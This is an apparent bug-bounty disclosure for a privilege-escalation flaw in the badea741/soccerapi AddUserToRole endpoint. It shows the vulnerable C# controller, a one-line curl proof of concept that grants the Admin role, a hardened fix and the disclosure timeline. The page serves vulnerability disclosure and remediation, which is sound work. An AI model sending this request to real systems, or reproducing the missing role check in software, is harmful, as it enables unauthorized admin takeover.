Normal user can set himself or any other user to admin role in badea741/soccerapi

Valid

Reported on

Sep 20th 2022


Description

Improper access control on the API endpoint AddUserToRole allows a regular user to escalate his privileges to admin.

Infected code

    [Authorize(Roles = Roles.User)]
    [HttpPost]
    public async Task<IActionResult> AddUserToRole([FromQuery] string username, string role)
    {
        var results = await _auth.AddUserToRoleAsync(username, role);
        if (!results.IsSuccess)
            return BadRequest(results);
        return Ok(results);
    }

As seen, the endpoint only requires the caller to hold the User role, and there is no check on which role can be added, so the added role can be Admin.

Proof of Concept

curl -X 'POST' \
  'http://<SERVER>/Auth/AddUserToRole?username=<AnyUser>&role=Admin' \
  -H 'accept: */*' \
  -H 'Authorization: <TOKEN>' \
  -d ''

Impact

An attacker can escalate his privileges to be an admin, and doing so is a piece of cake.
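A hardened form of the AddUserToRole action shown above, as an added example and not the project's own fix from commit 2a06fc: it restricts the endpoint to administrators and rejects any role outside an allow-list. `Roles.Admin`, `AuthResult`, `IAuthService`, the `AssignableRoles` set and the route template are assumptions; the report shows only `Roles.User`, `_auth`, `AddUserToRoleAsync` and the `/Auth/AddUserToRole` URL.

```csharp
using System;
using System.Collections.Generic;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Authorization;
using Microsoft.AspNetCore.Mvc;

public static class Roles
{
    public const string User = "User";
    public const string Admin = "Admin"; // assumed constant, matching role=Admin in the PoC
}

public record AuthResult(bool IsSuccess, string Message); // hypothetical result type

public interface IAuthService // hypothetical interface behind the injected _auth
{
    Task<AuthResult> AddUserToRoleAsync(string username, string role);
}

[ApiController]
[Route("[controller]/[action]")] // assumed template; yields /Auth/AddUserToRole as in the PoC
public class AuthController : ControllerBase
{
    // Roles that may be granted through this endpoint; anything else is rejected.
    private static readonly HashSet<string> AssignableRoles =
        new(StringComparer.OrdinalIgnoreCase) { Roles.User, Roles.Admin };

    private readonly IAuthService _auth;
    public AuthController(IAuthService auth) => _auth = auth;

    // Changing role membership is an administrative action, so a token
    // carrying only the User role is refused with 403 by the framework.
    [Authorize(Roles = Roles.Admin)]
    [HttpPost]
    public async Task<IActionResult> AddUserToRole(
        [FromQuery] string username, [FromQuery] string role)
    {
        // Validate input before it reaches the auth service.
        if (string.IsNullOrWhiteSpace(username) || !AssignableRoles.Contains(role ?? ""))
            return BadRequest("Unknown user or role.");

        var results = await _auth.AddUserToRoleAsync(username, role);
        if (!results.IsSuccess)
            return BadRequest(results);
        return Ok(results);
    }
}
```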

We are processing your report and will contact the badea741/soccerapi team within 24 hours. a year ago
Aly Khaled modified the report
a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have contacted a member of the badea741/soccerapi team and are waiting to hear back a year ago
badea741 validated this vulnerability a year ago
Aly Khaled has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
badea741 marked this as fixed in 1.1 with commit 2a06fc a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
AuthController.cs#L67 has been validated